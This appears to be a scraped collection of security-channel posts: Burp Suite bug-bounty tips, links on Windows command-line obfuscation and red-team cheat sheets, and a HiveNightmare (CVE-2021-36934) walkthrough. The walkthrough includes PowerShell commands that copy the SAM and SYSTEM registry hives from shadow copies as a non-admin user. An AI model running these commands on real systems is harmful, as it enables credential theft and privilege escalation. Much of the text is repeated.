Plugin name: BurpBounty Scan Check Builder.
It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️
It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️
APT
🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves…
WINDOWS LPE "HiveNightmare" or "SeriousSAM"
1) Check permissions:
3) Copy SAM and SYSTEM files from shadow copy:
CVE-2021-36934
The problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating.1) Check permissions:
icacls.exe C:\Windows\System32\config\SAM
2) Check shadow copies, restore points[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM')
... and so on3) Copy SAM and SYSTEM files from shadow copy:
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM')
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')#BurpHacksForBounties - Tip 20/30
Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity.
https://sansorg.egnyte.com/dd/x19ByeTOpS/
Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity.
https://sansorg.egnyte.com/dd/x19ByeTOpS/
#BurpHacksForBounties - Day 21/30
❤️ Burp Collaborator ❤️ 🙈
Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing.
See what, how, and why👇🏻
❤️ Burp Collaborator ❤️ 🙈
Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing.
See what, how, and why👇🏻
1/n when injection occurs with a payload that triggers interaction to some other site, to verify such scenarios this Collaborator comes in handy. Works on client-server model.
The public server hosted by PortSwigger. Self-hosting is possible too.
How to use a client? 👇🏻
The public server hosted by PortSwigger. Self-hosting is possible too.
How to use a client? 👇🏻
2/n
Image 1 - Start Collaborator client
Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain.
- Use that URL in the payload
Image 3 - Poll to see the request made on the URL.
Image 4 - Req payload
In my case: DNS, HTTP requests were made.
Image 1 - Start Collaborator client
Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain.
- Use that URL in the payload
Image 3 - Poll to see the request made on the URL.
Image 4 - Req payload
In my case: DNS, HTTP requests were made.
3/n
Useful in :
- Blind SQLi
- SSRF
- XSS
- Detecting any out-of-bound source loads you can think of.
- Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed
Read more at:
https://portswigger.net/burp/documentation/collaborator
Useful in :
- Blind SQLi
- SSRF
- XSS
- Detecting any out-of-bound source loads you can think of.
- Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed
Read more at:
https://portswigger.net/burp/documentation/collaborator
portswigger.net
Burp Collaborator - PortSwigger
Burp Collaborator is a network service that enables you to detect invisible vulnerabilities. These are vulnerabilities that don't: Trigger error messages. ...
Cheat sheet when designing offensive code
Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg
#redteam #sysmon
Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg
#redteam #sysmon
Windows Command-Line Obfuscation
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.
# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
#cheatsheet #cmd #pentest
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.
# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
#cheatsheet #cmd #pentest
www.wietzebeukema.nl
Windows Command-Line Obfuscation
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due…
#BurpHacksForBounties - Day 22/30
🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java.
Thank you Burp Suite for making it easy
#infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security
🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java.
Thank you Burp Suite for making it easy
#infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security
1/n [JAVA]
- Download API interfaces from Burp -> Extender -> APIs -> Save Interface files.
- Create a package name burp and save files there, you can choose any IDE of your choice.
- Make IDE ready to build JAR.
- Create file name BurpExtender and add the following code.
- Download API interfaces from Burp -> Extender -> APIs -> Save Interface files.
- Create a package name burp and save files there, you can choose any IDE of your choice.
- Make IDE ready to build JAR.
- Create file name BurpExtender and add the following code.
2/n
- File name Burp Extender will be an entry point for your plugin, Extending interface registers this in Burp on loading. All logic for the plugin goes here.
- Build Jar
- Load Jar in Burp.
- File name Burp Extender will be an entry point for your plugin, Extending interface registers this in Burp on loading. All logic for the plugin goes here.
- Build Jar
- Load Jar in Burp.
3/n
- You can also build Jar from the command line with these commands.
Code location -> cd usercode
loc for *.class files -> mkdir build
location for jar -> mkdir bin
Compile code -> javac -d build src/burp/*.java
Build Jar -> jar cf bin/burpextender.jar -C build burp
- You can also build Jar from the command line with these commands.
Code location -> cd usercode
loc for *.class files -> mkdir build
location for jar -> mkdir bin
Compile code -> javac -d build src/burp/*.java
Build Jar -> jar cf bin/burpextender.jar -C build burp